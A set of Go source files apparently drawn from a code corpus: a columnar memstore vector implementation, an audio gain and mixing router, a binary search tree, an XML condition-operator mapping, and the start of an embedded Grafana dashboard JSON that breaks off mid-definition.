// cLiveVectorParty is the implementation of LiveVectorParty with c allocated memory
// this vector party stores columns with fixed length data type
type cLiveVectorParty struct {
	cVectorParty
}
// SetBool implements SetBool in LiveVectorParty interface. It records the
// validity bit for the row and stores the boolean value.
// (A redundant bare `return` at the end of this void function was removed.)
func (vp *cLiveVectorParty) SetBool(offset int, val bool, valid bool) {
	vp.setValidity(offset, valid)
	vp.values.SetBool(offset, val)
}
// SetValue implements SetValue in LiveVectorParty interface.
// (Comment previously said "SetBool" — copy/paste artifact, corrected.)
func (vp *cLiveVectorParty) SetValue(offset int, val unsafe.Pointer, valid bool) {
	vp.setValidity(offset, valid)
	if valid {
		vp.values.SetValue(offset, val)
	} else {
		// Zero out 16 bytes so an invalid slot never exposes stale data.
		var zero [2]uint64
		vp.values.SetValue(offset, unsafe.Pointer(&zero))
	}
}

// SetGoValue implements SetGoValue in LiveVectorParty interface.
// Go-allocated values are only handled by goLiveVectorParty.
func (vp *cLiveVectorParty) SetGoValue(offset int, val common.GoDataValue, valid bool) {
	panic("SetGoValue is not supported in cLiveVectorParty")
}

// GetValue implements GetValue in LiveVectorParty interface.
func (vp *cLiveVectorParty) GetValue(offset int) (unsafe.Pointer, bool) {
	return vp.values.GetValue(offset), vp.GetValidity(offset)
}

// goLiveVectorParty is the implementation of LiveVectorParty with go allocated memory
// this vector party stores columns with variable length data type
type goLiveVectorParty struct {
	baseVectorParty
	values            []common.GoDataValue // one entry per row; nil marks a null row
	hostMemoryManager common.HostMemoryManager
	totalBytes        int64 // running byte total of values, maintained by SetGoValue
}

// GetMinMaxValue implements GetMinMaxValue in LiveVectorParty interface.
func (vp *cLiveVectorParty) GetMinMaxValue() (min uint32, max uint32) {
	return vp.values.GetMinValue(), vp.values.GetMaxValue()
}

// Allocate implements Allocate in VectorParty interface.
func (vp *cLiveVectorParty) Allocate(hasCount bool) {
	vp.cVectorParty.Allocate(hasCount)
	// Freshly allocated slots start out holding the column default value.
	vp.fillWithDefaultValue()
}

// Allocate implements Allocate in VectorParty interface.
func (vp *goLiveVectorParty) Allocate(hasCount bool) {
	vp.values = make([]common.GoDataValue, vp.length)
}

// SetDataValue implements SetDataValue in VectorParty interface
// liveVectorParty ignores countsUpdateMode or counts
func (vp *goLiveVectorParty) SetDataValue(offset int, value common.DataValue,
	countsUpdateMode common.ValueCountsUpdateMode, counts ...uint32) {
	vp.SetGoValue(offset, value.GoVal, value.Valid)
}

// SetBool implements SetBool in LiveVectorParty interface.
func (vp *goLiveVectorParty) SetBool(offset int, val bool, valid bool) {
	panic("SetBool is not supported in goLiveVectorParty")
}

// SetValue implements SetValue in LiveVectorParty interface.
func (vp *goLiveVectorParty) SetValue(offset int, val unsafe.Pointer, valid bool) {
	panic("SetValue is not supported in goLiveVectorParty")
}

// GetValue implements GetValue in LiveVectorParty interface.
func (vp *goLiveVectorParty) GetValue(offset int) (unsafe.Pointer, bool) {
	panic("GetValue is not supported in goLiveVectorParty")
}
// SetGoValue implements SetGoValue in LiveVectorParty interface.
// It stores val at offset (nil when valid is false) and reports the byte
// delta to the host memory manager.
func (vp *goLiveVectorParty) SetGoValue(offset int, val common.GoDataValue, valid bool) {
	oldBytes, newBytes := 0, 0
	if vp.values[offset] != nil {
		oldBytes = vp.values[offset].GetBytes()
	}
	if !valid || val == nil {
		newBytes = 0
		vp.values[offset] = nil
	} else {
		newBytes = val.GetBytes()
		vp.values[offset] = val
	}
	// Keep unmanaged-memory accounting in sync with the change.
	bytesChange := int64(newBytes - oldBytes)
	vp.hostMemoryManager.ReportUnmanagedSpaceUsageChange(bytesChange)
	vp.totalBytes += bytesChange
}

// GetDataValue implements GetDataValue in VectorParty interface.
func (vp *goLiveVectorParty) GetDataValue(offset int) common.DataValue {
	val := common.DataValue{
		Valid:    vp.GetValidity(offset),
		DataType: vp.dataType,
	}
	if !val.Valid {
		return val
	}
	val.GoVal = vp.values[offset]
	return val
}

// GetDataValueByRow implements GetDataValueByRow in VectorParty interface.
// For a live vector party the row number is the offset.
func (vp *goLiveVectorParty) GetDataValueByRow(row int) common.DataValue {
	return vp.GetDataValue(row)
}

// GetValidity implements GetValidity in VectorParty interface.
// A nil entry marks an invalid (null) row.
func (vp *goLiveVectorParty) GetValidity(offset int) bool {
	return vp.values[offset] != nil
}

// GetMinMaxValue is **not supported** by goLiveVectorParty.
func (vp *goLiveVectorParty) GetMinMaxValue() (min uint32, max uint32) {
	return 0, 0
}
// GetBytes implements GetBytes in VectorParty interface.
func (vp *goLiveVectorParty) GetBytes() int64 {
	return vp.totalBytes
}

// Slice implements Slice in VectorParty interface.
// It returns up to numRows human-readable values starting at startRow.
func (vp *goLiveVectorParty) Slice(startRow, numRows int) common.SlicedVector {
	beginIndex := startRow
	// size is the number of entries in the vector,
	// clamped to the range [0, numRows].
	size := vp.length - beginIndex
	if size < 0 {
		size = 0
	}
	if size > numRows {
		size = numRows
	}
	vector := common.SlicedVector{
		Values: make([]interface{}, size),
		Counts: make([]int, size),
	}
	for i := 0; i < size; i++ {
		vector.Values[i] = vp.GetDataValue(beginIndex + i).ConvertToHumanReadable(vp.dataType)
		// Counts is cumulative: entry i covers i+1 rows.
		vector.Counts[i] = i + 1
	}
	return vector
}
// Write implements Write in VectorParty interface.
// Serialized layout: total bytes (uint64), row count (uint32), number of
// valid values (uint32), then the values. Each value is prefixed with its
// row index unless every row is valid, in which case the index is implied
// by position.
func (vp *goLiveVectorParty) Write(writer io.Writer) error {
	bufferWriter := bufio.NewWriter(writer)
	dataWriter := utils.NewStreamDataWriter(bufferWriter)
	// write total bytes for reporting during loading
	err := dataWriter.WriteUint64(uint64(vp.GetBytes()))
	if err != nil {
		return err
	}
	// write length
	err = dataWriter.WriteUint32(uint32(vp.length))
	if err != nil {
		return err
	}
	// count non nil values
	numValidValues := 0
	for _, value := range vp.values {
		if value != nil {
			numValidValues++
		}
	}
	// write number of valid values
	err = dataWriter.WriteUint32(uint32(numValidValues))
	if err != nil {
		return err
	}
	allValid := numValidValues == vp.length
	// write values
	for i, value := range vp.values {
		if value != nil {
			// only write index if not all valid
			if !allValid {
				err = dataWriter.WriteUint32(uint32(i))
				if err != nil {
					return err
				}
			}
			err = value.Write(&dataWriter)
			if err != nil {
				return err
			}
		}
	}
	return bufferWriter.Flush()
}

// Read implements Read in VectorParty interface.
// It consumes the layout produced by Write above and reports the loaded
// memory usage to the serializer.
func (vp *goLiveVectorParty) Read(reader io.Reader, serializer common.VectorPartySerializer) error {
	dataReader := utils.NewStreamDataReader(reader)
	// read total bytes for reporting during loading
	totalBytes, err := dataReader.ReadUint64()
	if err != nil {
		return err
	}
	vp.totalBytes = int64(totalBytes)
	serializer.ReportVectorPartyMemoryUsage(int64(totalBytes * utils.GolangMemoryFootprintFactor))
	length, err := dataReader.ReadUint32()
	if err != nil {
		return err
	}
	vp.length = int(length)
	vp.Allocate(false)
	numValidValues, err := dataReader.ReadUint32()
	if err != nil {
		return err
	}
	allValid := numValidValues == uint32(vp.length)
	for i := 0; i < int(numValidValues); i++ {
		var index uint32
		if !allValid {
			// Sparse encoding: each value carries its explicit row index.
			index, err = dataReader.ReadUint32()
			if err != nil {
				return err
			}
		} else {
			index = uint32(i)
		}
		goValue := common.GetGoDataValue(vp.dataType)
		err = goValue.Read(&dataReader)
		if err != nil {
			return err
		}
		vp.values[index] = goValue
	}
	return nil
}
// SafeDestruct implements SafeDestruct in VectorParty interface.
// It nils out every stored value so the GC can reclaim them, then drops
// the slice itself and resets the length.
func (vp *goLiveVectorParty) SafeDestruct() {
	for i := 0; i < len(vp.values); i++ {
		vp.values[i] = nil
	}
	vp.values = nil
	vp.length = 0
}
// Equals implements Equals in VectorParty interface. Two parties are equal
// when both are nil, or when they share the same data type and length, the
// other party is also a goLiveVectorParty, and every stored value is deeply
// equal.
func (vp *goLiveVectorParty) Equals(other common.VectorParty) bool {
	if vp == nil || other == nil {
		return vp == nil && other == nil
	}
	if vp.dataType != other.GetDataType() {
		return false
	}
	if vp.GetLength() != other.GetLength() {
		return false
	}
	otherVP, ok := other.(*goLiveVectorParty)
	if !ok {
		return false
	}
	// reflect.DeepEqual already treats two nil interface values as equal and
	// a nil/non-nil pair as unequal, so the previous explicit nil branch was
	// redundant and has been folded into a single comparison.
	for i := range vp.values {
		if !reflect.DeepEqual(vp.values[i], otherVP.values[i]) {
			return false
		}
	}
	return true
}
// Dump writes a human-readable listing of the vector party's values to file
// for debugging.
func (vp *goLiveVectorParty) Dump(file *os.File) {
	fmt.Fprintf(file, "\nGO LiveVectorParty, type: %s, length: %d, value: \n", common.DataTypeName[vp.dataType], vp.GetLength())
	for i := 0; i < vp.GetLength(); i++ {
		val := vp.GetDataValue(i)
		if val.Valid {
			fmt.Fprintf(file, "\t%v\n", val.ConvertToHumanReadable(vp.dataType))
		} else {
			// Bug fix: this previously called fmt.Println(file, "\tnil"),
			// which printed the *os.File value and the text to stdout
			// instead of writing "\tnil" into the dump file.
			fmt.Fprintln(file, "\tnil")
		}
	}
}
// NewLiveVectorParty creates LiveVectorParty. The concrete implementation is
// chosen from the data type: go-allocated for Go types, list-backed for
// array types, and c-allocated for everything else (fixed-width types).
func NewLiveVectorParty(length int, dataType common.DataType, defaultValue common.DataValue, hostMemoryManager common.HostMemoryManager) common.LiveVectorParty {
	isGoType := common.IsGoType(dataType)
	if isGoType {
		return newGoLiveVetorParty(length, dataType, hostMemoryManager)
	}
	if common.IsArrayType(dataType) {
		return list.NewLiveVectorParty(length, dataType, hostMemoryManager)
	}
	return newCLiveVectorParty(length, dataType, defaultValue)
}

// newCLiveVectorParty creates a LiveVectorParty with c allocated memory.
func newCLiveVectorParty(length int, dataType common.DataType, defaultValue common.DataValue) *cLiveVectorParty {
	vp := &cLiveVectorParty{
		cVectorParty: cVectorParty{
			baseVectorParty: baseVectorParty{
				length:       length,
				dataType:     dataType,
				defaultValue: defaultValue,
			},
		},
	}
	return vp
}
func newGoLiveVetorParty(length int, dataType common.DataType, hostMemoryManager common.HostMemoryManager) *goLiveVectorParty {
vp := &goLiveVectorParty{
baseVectorParty: baseVectorParty{
length: length,
dataType: dataType,
defaultValue: common.NullDataValue,
},
hostMemoryManager: hostMemoryManager,
}
return vp
} | memstore/live_vector_party.go | 0.658527 | 0.422326 | live_vector_party.go | starcoder |
package router
import (
"github.com/kwoodhouse93/audio-playground/source"
"github.com/kwoodhouse93/audio-playground/types"
)
// Gain returns a filter that multiplies the signals in the buffer by a
// constant value.
func Gain(src source.Source, gain float32) source.Source {
	return func(step int) types.Sample {
		return src(step).Gain(gain)
	}
}
// Sum2 returns a filter that adds two signals together.
// Be careful using this without first reducing the gain of the sources.
func Sum2(src1, src2 source.Source) source.Source {
	return func(step int) types.Sample {
		return src1(step).Sum(src2(step))
	}
}
// Sum2Comp returns a function that adds two signals together and reduces
// their volume by half to compensate for the addition.
func Sum2Comp(src1, src2 source.Source) source.Source {
	return func(step int) types.Sample {
		return src1(step).Sum(src2(step)).Gain(0.5)
	}
}
// Sum returns a filter that adds multiple signals together.
// Failing to reduce the gain of these signals will likely cause severe
// clipping. Note: panics when called with no sources.
func Sum(srcs ...source.Source) source.Source {
	out := srcs[0]
	for i := 1; i < len(srcs); i++ {
		out = Sum2(out, srcs[i])
	}
	return out
}
// SumComp returns a filter that adds multiple signals together while
// compensating for the resulting increase in volume, giving every input an
// equal weight of 1/len(srcs).
//
// Bug fix: the previous implementation applied the 1/n compensation gain at
// every pairwise summing step, so earlier sources were attenuated
// repeatedly (srcs[0] ended up scaled by (1/n)^(n-1)) and the mix was not
// uniform. Scaling each source exactly once before summing produces the
// intended equal-weight mix.
func SumComp(srcs ...source.Source) source.Source {
	compGain := 1 / float32(len(srcs))
	scaled := make([]source.Source, len(srcs))
	for i, src := range srcs {
		scaled[i] = Gain(src, compGain)
	}
	return Sum(scaled...)
}
// Mixer2 returns a filter that mixes two signals together, scaling each by
// its own gain before summing.
func Mixer2(src1, src2 source.Source, gain1, gain2 float32) source.Source {
	g1 := Gain(src1, gain1)
	g2 := Gain(src2, gain2)
	return Sum2(g1, g2)
}
// SourceGain represents a source and gain pair to use in a Mixer.
type SourceGain struct {
	Source source.Source // the input signal
	Gain   float32       // multiplier applied to the source before mixing
}
// Mixer returns a filter that mixes any number of signals together
func Mixer(inputs []SourceGain) source.Source {
sources := make([]source.Source, len(inputs))
for i, input := range inputs {
sources[i] = Gain(input.Source, input.Gain)
}
return Sum(sources...)
} | router/router.go | 0.830937 | 0.455259 | router.go | starcoder |
package bst
import (
"bufio"
"fmt"
"io"
"strings"
)
// Order specifies a tree traversal order for a Tree's Walk method.
type Order int

// Possible Order values.
const (
	PreOrder Order = iota // visit node, then left subtree, then right subtree
	InOrder               // visit left subtree, then node, then right subtree
	PostOrder             // visit left subtree, then right subtree, then node
)
// A Tree is a basic binary search tree. The zero value is an empty tree
// ready for use.
type Tree struct {
	root *Node
}
// ParseTree creates a Tree from an input series of "key,value" pair strings
// separated by newlines. Lines that do not contain exactly one comma
// produce an error.
func ParseTree(r io.Reader) (*Tree, error) {
	var t Tree
	sc := bufio.NewScanner(r)
	for sc.Scan() {
		line := sc.Text()
		parts := strings.Split(line, ",")
		if len(parts) != 2 {
			return nil, fmt.Errorf("bst: malformed tree entry: %q", line)
		}
		t.Insert(parts[0], parts[1])
	}
	if err := sc.Err(); err != nil {
		return nil, err
	}
	return &t, nil
}
// Insert inserts a new key/value pair Node into the Tree.
func (t *Tree) Insert(key, value string) {
	n := node(key, value)
	if t.root == nil {
		t.root = n
		return
	}
	t.root.insert(n)
}
// Walk walks each Node in the tree using the specified Order, calling fn
// for every node visited.
func (t *Tree) Walk(order Order, fn func(n *Node)) {
	if t.root != nil {
		t.root.walk(order, fn)
	}
}
// Search determines if key is present in the tree, returning its value and
// whether or not the key was found.
func (t *Tree) Search(key string) (string, bool) {
	if t.root != nil {
		return t.root.search(key)
	}
	return "", false
}
// node is a shortcut for creating a leaf Node holding key/value.
func node(key, value string) *Node {
	return &Node{Key: key, Value: value}
}
// A Node is a key/value pair Node in a Tree.
type Node struct {
	Key   string
	Value string
	left  *Node // subtree of keys <= Key
	right *Node // subtree of keys > Key
}
// insert places x into the subtree rooted at n. Keys greater than n.Key go
// right; all others — including duplicates — go left.
func (n *Node) insert(x *Node) {
	target := &n.left
	if n.Key < x.Key {
		target = &n.right
	}
	if *target == nil {
		// Empty slot: attach the new node here.
		*target = x
		return
	}
	// Otherwise descend recursively.
	(*target).insert(x)
}
// walk visits the subtree rooted at n, applying fn to each Node in the
// requested Order. A nil receiver is a no-op; an unknown Order panics.
func (n *Node) walk(order Order, fn func(n *Node)) {
	if n == nil {
		return
	}
	switch order {
	case PreOrder:
		fn(n)
		n.left.walk(order, fn)
		n.right.walk(order, fn)
	case InOrder:
		n.left.walk(order, fn)
		fn(n)
		n.right.walk(order, fn)
	case PostOrder:
		n.left.walk(order, fn)
		n.right.walk(order, fn)
		fn(n)
	default:
		panic("bst: Node.walk called with unknown Order value")
	}
}
func (n *Node) search(key string) (string, bool) {
if n == nil {
return "", false
}
switch strings.Compare(key, n.Key) {
case 0:
return n.Value, true
case -1:
return n.left.search(key)
case 1:
return n.right.search(key)
}
panic("bst: Node.search hit unreachable code")
} | go/algorithms/bst/bst.go | 0.726426 | 0.421433 | bst.go | starcoder |
package primitives
import (
"encoding/xml"
)
//ConditionOperatorType is a direct mapping of XSD ST_ConditionalFormattingOperator
type ConditionOperatorType byte

//ConditionOperatorType maps for marshal/unmarshal process.
//ToConditionOperatorType is derived from FromConditionOperatorType in init.
var (
	ToConditionOperatorType   map[string]ConditionOperatorType
	FromConditionOperatorType map[ConditionOperatorType]string
)

//List of all possible values for OperatorType.
//The leading blank identifier reserves 0 as an "unset" value.
const (
	_ ConditionOperatorType = iota
	ConditionOperatorLessThan
	ConditionOperatorLessThanOrEqual
	ConditionOperatorEqual
	ConditionOperatorNotEqual
	ConditionOperatorGreaterThanOrEqual
	ConditionOperatorGreaterThan
	ConditionOperatorBetween
	ConditionOperatorNotBetween
	ConditionOperatorContainsText
	ConditionOperatorNotContains
	ConditionOperatorBeginsWith
	ConditionOperatorEndsWith
)
// init populates the forward map and derives the reverse lookup from it,
// guaranteeing the two stay consistent.
func init() {
	FromConditionOperatorType = map[ConditionOperatorType]string{
		ConditionOperatorLessThan:           "lessThan",
		ConditionOperatorLessThanOrEqual:    "lessThanOrEqual",
		ConditionOperatorEqual:              "equal",
		ConditionOperatorNotEqual:           "notEqual",
		ConditionOperatorGreaterThanOrEqual: "greaterThanOrEqual",
		ConditionOperatorGreaterThan:        "greaterThan",
		ConditionOperatorBetween:            "between",
		ConditionOperatorNotBetween:         "notBetween",
		ConditionOperatorContainsText:       "containsText",
		ConditionOperatorNotContains:        "notContains",
		ConditionOperatorBeginsWith:         "beginsWith",
		ConditionOperatorEndsWith:           "endsWith",
	}
	ToConditionOperatorType = make(map[string]ConditionOperatorType, len(FromConditionOperatorType))
	for code, name := range FromConditionOperatorType {
		ToConditionOperatorType[name] = code
	}
}
// String returns the XSD token for t, or "" for unknown/unset values.
func (t ConditionOperatorType) String() string {
	return FromConditionOperatorType[t]
}
// MarshalXMLAttr marshals ConditionOperatorType as an XML attribute.
// Unknown values produce an empty xml.Attr, which encoding/xml omits
// from the output.
func (t *ConditionOperatorType) MarshalXMLAttr(name xml.Name) (xml.Attr, error) {
	v, ok := FromConditionOperatorType[*t]
	if !ok {
		return xml.Attr{}, nil
	}
	return xml.Attr{Name: name, Value: v}, nil
}
//UnmarshalXMLAttr unmarshal ConditionOperatorType
func (t *ConditionOperatorType) UnmarshalXMLAttr(attr xml.Attr) error {
if v, ok := ToConditionOperatorType[attr.Value]; ok {
*t = v
}
return nil
} | internal/ml/primitives/condition_operator.go | 0.643329 | 0.446374 | condition_operator.go | starcoder |
package cmd
const dashboardJsonV3 = `
{
"id": 1,
"title": "Belt",
"originalTitle": "Belt",
"tags": [],
"style": "dark",
"timezone": "browser",
"editable": true,
"hideControls": true,
"sharedCrosshair": false,
"rows": [
{
"collapse": false,
"editable": false,
"height": "250px",
"panels": [
{
"cacheTimeout": null,
"colorBackground": false,
"colorValue": false,
"colors": [
"rgba(245, 54, 54, 0.9)",
"rgba(237, 129, 40, 0.89)",
"rgba(50, 172, 45, 0.97)"
],
"datasource": null,
"editable": false,
"error": false,
"format": "percent",
"gauge": {
"maxValue": 100,
"minValue": 0,
"show": true,
"thresholdLabels": false,
"thresholdMarkers": true
},
"height": "",
"id": 2,
"interval": "1s",
"isNew": true,
"links": [],
"maxDataPoints": 100,
"nullPointMode": "connected",
"nullText": null,
"postfix": "",
"postfixFontSize": "50%",
"prefix": "",
"prefixFontSize": "50%",
"span": 2,
"sparkline": {
"fillColor": "rgba(31, 118, 189, 0.18)",
"full": false,
"lineColor": "rgb(31, 120, 193)",
"show": false
},
"targets": [
{
"dsType": "influxdb",
"groupBy": [
{
"params": [
"$interval"
],
"type": "time"
},
{
"params": [
"null"
],
"type": "fill"
}
],
"measurement": "cpu",
"policy": "default",
"query": "SELECT mean(\"usage_user\") + mean(\"usage_system\") FROM \"cpu\" WHERE $timeFilter GROUP BY time($interval) fill(null)",
"rawQuery": true,
"refId": "A",
"resultFormat": "time_series",
"select": [
[
{
"params": [
"usage_user"
],
"type": "field"
},
{
"params": [],
"type": "mean"
}
]
],
"tags": []
}
],
"thresholds": "",
"title": "Cluster CPU Avg.",
"type": "singlestat",
"valueFontSize": "80%",
"valueMaps": [
{
"op": "=",
"text": "N/A",
"value": "null"
}
],
"valueName": "avg"
},
{
"aliasColors": {},
"bars": true,
"datasource": null,
"editable": false,
"error": false,
"fill": 1,
"grid": {
"threshold1": null,
"threshold1Color": "rgba(216, 200, 27, 0.27)",
"threshold2": null,
"threshold2Color": "rgba(234, 112, 112, 0.22)"
},
"id": 1,
"isNew": true,
"legend": {
"alignAsTable": true,
"avg": false,
"current": false,
"max": false,
"min": false,
"rightSide": true,
"show": false,
"total": false,
"values": false
},
"lines": false,
"linewidth": 1,
"links": [],
"nullPointMode": "connected",
"percentage": false,
"pointradius": 1,
"points": false,
"renderer": "flot",
"seriesOverrides": [],
"span": 3,
"stack": false,
"steppedLine": false,
"targets": [
{
"alias": "[[tag_host]]",
"dsType": "influxdb",
"groupBy": [
{
"params": [
"$interval"
],
"type": "time"
},
{
"params": [
"host"
],
"type": "tag"
},
{
"params": [
"null"
],
"type": "fill"
}
],
"measurement": "cpu",
"policy": "default",
"refId": "A",
"resultFormat": "time_series",
"select": [
[
{
"params": [
"usage_user"
],
"type": "field"
},
{
"params": [],
"type": "mean"
}
]
],
"tags": []
}
],
"timeFrom": null,
"timeShift": null,
"title": "CPU usage",
"tooltip": {
"msResolution": false,
"shared": false,
"value_type": "cumulative"
},
"type": "graph",
"xaxis": {
"show": true
},
"yaxes": [
{
"format": "percent",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
},
{
"format": "short",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
}
]
},
{
"aliasColors": {},
"bars": false,
"datasource": null,
"editable": false,
"error": false,
"fill": 2,
"grid": {
"threshold1": null,
"threshold1Color": "rgba(216, 200, 27, 0.27)",
"threshold2": null,
"threshold2Color": "rgba(234, 112, 112, 0.22)"
},
"id": 4,
"isNew": true,
"legend": {
"alignAsTable": true,
"avg": false,
"current": false,
"max": false,
"min": false,
"rightSide": true,
"show": false,
"total": false,
"values": false
},
"lines": true,
"linewidth": 1,
"links": [],
"nullPointMode": "connected",
"percentage": false,
"pointradius": 5,
"points": false,
"renderer": "flot",
"seriesOverrides": [],
"span": 4,
"stack": false,
"steppedLine": false,
"targets": [
{
"alias": "[[tag_host]]",
"dsType": "influxdb",
"groupBy": [
{
"params": [
"$interval"
],
"type": "time"
},
{
"params": [
"host"
],
"type": "tag"
},
{
"params": [
"null"
],
"type": "fill"
}
],
"measurement": "mem",
"policy": "default",
"query": "SELECT mean(\"usage_user\") FROM \"cpu\" WHERE $timeFilter GROUP BY time($interval), \"host\" fill(null)",
"rawQuery": false,
"refId": "A",
"resultFormat": "time_series",
"select": [
[
{
"params": [
"used"
],
"type": "field"
},
{
"params": [],
"type": "mean"
}
]
],
"tags": []
}
],
"timeFrom": null,
"timeShift": null,
"title": "MEM usage",
"tooltip": {
"msResolution": false,
"shared": false,
"value_type": "cumulative"
},
"type": "graph",
"xaxis": {
"show": true
},
"yaxes": [
{
"format": "bytes",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
},
{
"format": "short",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
}
]
},
{
"aliasColors": {},
"bars": false,
"datasource": null,
"editable": true,
"error": false,
"fill": 2,
"grid": {
"threshold1": null,
"threshold1Color": "rgba(216, 200, 27, 0.27)",
"threshold2": null,
"threshold2Color": "rgba(234, 112, 112, 0.22)"
},
"id": 9,
"isNew": true,
"legend": {
"alignAsTable": true,
"avg": false,
"current": false,
"max": false,
"min": false,
"rightSide": true,
"show": false,
"total": false,
"values": false
},
"lines": true,
"linewidth": 1,
"links": [],
"nullPointMode": "connected",
"percentage": false,
"pointradius": 5,
"points": false,
"renderer": "flot",
"scopedVars": {},
"seriesOverrides": [],
"span": 3,
"stack": true,
"steppedLine": false,
"targets": [
{
"alias": "[[tag_host]]",
"dsType": "influxdb",
"groupBy": [
{
"params": [
"$interval"
],
"type": "time"
},
{
"params": [
"host"
],
"type": "tag"
},
{
"params": [
"null"
],
"type": "fill"
}
],
"measurement": "conntrack",
"policy": "default",
"refId": "A",
"resultFormat": "time_series",
"select": [
[
{
"params": [
"ip_conntrack_count"
],
"type": "field"
},
{
"params": [],
"type": "mean"
}
]
],
"tags": []
}
],
"timeFrom": null,
"timeShift": null,
"title": "IP Conn Track",
"tooltip": {
"msResolution": false,
"shared": false,
"value_type": "individual"
},
"type": "graph",
"xaxis": {
"show": true
},
"yaxes": [
{
"format": "short",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
},
{
"format": "short",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
}
]
}
],
"showTitle": false,
"title": "Cluster"
},
{
"collapse": false,
"editable": false,
"height": "250px",
"panels": [
{
"cacheTimeout": null,
"colorBackground": false,
"colorValue": false,
"colors": [
"rgba(245, 54, 54, 0.9)",
"rgba(237, 129, 40, 0.89)",
"rgba(50, 172, 45, 0.97)"
],
"datasource": null,
"editable": false,
"error": false,
"format": "percent",
"gauge": {
"maxValue": 100,
"minValue": 0,
"show": true,
"thresholdLabels": false,
"thresholdMarkers": true
},
"height": "",
"id": 12,
"interval": "1s",
"isNew": true,
"links": [],
"maxDataPoints": 100,
"nullPointMode": "connected",
"nullText": null,
"postfix": "",
"postfixFontSize": "50%",
"prefix": "",
"prefixFontSize": "50%",
"scopedVars": {
"service": {
"selected": true,
"text": "nextapp",
"value": "nextapp"
}
},
"span": 2,
"sparkline": {
"fillColor": "rgba(31, 118, 189, 0.18)",
"full": false,
"lineColor": "rgb(31, 120, 193)",
"show": false
},
"targets": [
{
"dsType": "influxdb",
"groupBy": [
{
"params": [
"$interval"
],
"type": "time"
},
{
"params": [
"null"
],
"type": "fill"
}
],
"measurement": "mem",
"policy": "default",
"query": "SELECT 100 * sum(\"free\") / sum(\"total\") FROM \"mem\" WHERE $timeFilter GROUP BY time($interval) fill(null)",
"rawQuery": false,
"refId": "A",
"resultFormat": "time_series",
"select": [
[
{
"params": [
"available_percent"
],
"type": "field"
},
{
"params": [],
"type": "mean"
}
]
],
"tags": []
}
],
"thresholds": "25,50",
"title": "Cluster MEM Available",
"type": "singlestat",
"valueFontSize": "80%",
"valueMaps": [
{
"op": "=",
"text": "N/A",
"value": "null"
}
],
"valueName": "avg"
},
{
"aliasColors": {},
"bars": false,
"datasource": null,
"editable": false,
"error": false,
"fill": 1,
"grid": {
"threshold1": null,
"threshold1Color": "rgba(216, 200, 27, 0.27)",
"threshold2": null,
"threshold2Color": "rgba(234, 112, 112, 0.22)"
},
"id": 10,
"interval": "5s",
"isNew": true,
"legend": {
"alignAsTable": false,
"avg": false,
"current": false,
"max": false,
"min": false,
"rightSide": false,
"show": true,
"total": false,
"values": false
},
"lines": true,
"linewidth": 1,
"links": [],
"nullPointMode": "connected",
"percentage": false,
"pointradius": 1,
"points": false,
"renderer": "flot",
"scopedVars": {
"service": {
"selected": true,
"text": "nextapp",
"value": "nextapp"
}
},
"seriesOverrides": [],
"span": 4,
"stack": false,
"steppedLine": false,
"targets": [
{
"alias": "[[tag_com.docker.swarm.service.name]]",
"dsType": "influxdb",
"groupBy": [
{
"params": [
"$interval"
],
"type": "time"
},
{
"params": [
"com.docker.swarm.service.name"
],
"type": "tag"
},
{
"params": [
"null"
],
"type": "fill"
}
],
"measurement": "docker_container_cpu",
"policy": "default",
"refId": "B",
"resultFormat": "time_series",
"select": [
[
{
"params": [
"usage_percent"
],
"type": "field"
},
{
"params": [],
"type": "mean"
}
]
],
"tags": []
}
],
"timeFrom": null,
"timeShift": null,
"title": "%CPU by Service",
"tooltip": {
"msResolution": true,
"shared": true,
"value_type": "cumulative"
},
"type": "graph",
"xaxis": {
"show": true
},
"yaxes": [
{
"format": "percent",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
},
{
"format": "short",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
}
]
},
{
"aliasColors": {},
"bars": false,
"datasource": null,
"editable": false,
"error": false,
"fill": 1,
"grid": {
"threshold1": null,
"threshold1Color": "rgba(216, 200, 27, 0.27)",
"threshold2": null,
"threshold2Color": "rgba(234, 112, 112, 0.22)"
},
"id": 13,
"interval": "5s",
"isNew": true,
"legend": {
"alignAsTable": false,
"avg": false,
"current": false,
"max": false,
"min": false,
"rightSide": false,
"show": true,
"total": false,
"values": false
},
"lines": true,
"linewidth": 1,
"links": [],
"nullPointMode": "connected",
"percentage": false,
"pointradius": 1,
"points": false,
"renderer": "flot",
"seriesOverrides": [],
"span": 4,
"stack": false,
"steppedLine": false,
"targets": [
{
"alias": "[[tag_com.docker.swarm.service.name]]",
"dsType": "influxdb",
"groupBy": [
{
"params": [
"$interval"
],
"type": "time"
},
{
"params": [
"com.docker.swarm.service.name"
],
"type": "tag"
},
{
"params": [
"null"
],
"type": "fill"
}
],
"measurement": "docker_container_mem",
"policy": "default",
"refId": "B",
"resultFormat": "time_series",
"select": [
[
{
"params": [
"usage"
],
"type": "field"
},
{
"params": [],
"type": "mean"
}
]
],
"tags": []
}
],
"timeFrom": null,
"timeShift": null,
"title": "MEM by Service",
"tooltip": {
"msResolution": true,
"shared": true,
"value_type": "cumulative"
},
"type": "graph",
"xaxis": {
"show": true
},
"yaxes": [
{
"format": "bytes",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
},
{
"format": "short",
"label": null,
"logBase": 1,
"max": null,
"min": null,
"show": true
}
]
},
{
"aliasColors": {},
"bars": false,
"datasource": null,
"editable": false,
"error": false,
"fill": 1,
"grid": {
"threshold1": null,
"threshold1Color": "rgba(216, 200, 27, 0.27)",
"threshold2": null,
"threshold2Color": "rgba(234, 112, 112, 0.22)"
},
"id": 11,
"isNew": true,
"legend": {
"alignAsTable": false,
"avg": false,
"current": false,
"max": false,
"min": false,
"rightSide": false,
"show": true,
"total": false,
"values": false
},
"lines": true,
"linewidth": 1,
"links": [],
"nullPointMode": "connected",
"percentage": false,
"pointradius": 1,
"points": false,
"renderer": "flot",
"scopedVars": {
"service": {
"selected": true,
"text": "nextapp",
"value": "nextapp"
}
},
"seriesOverrides": [],
"span": 2,
"stack": false,
"steppedLine": false,
"targets": [
{
"alias": "rx drop",
"dsType": "influxdb",
"groupBy": [
{
"params": [
"$interval"
],
"type": "time"
},
{
"params": [
"com.docker.swarm.service.name"
],
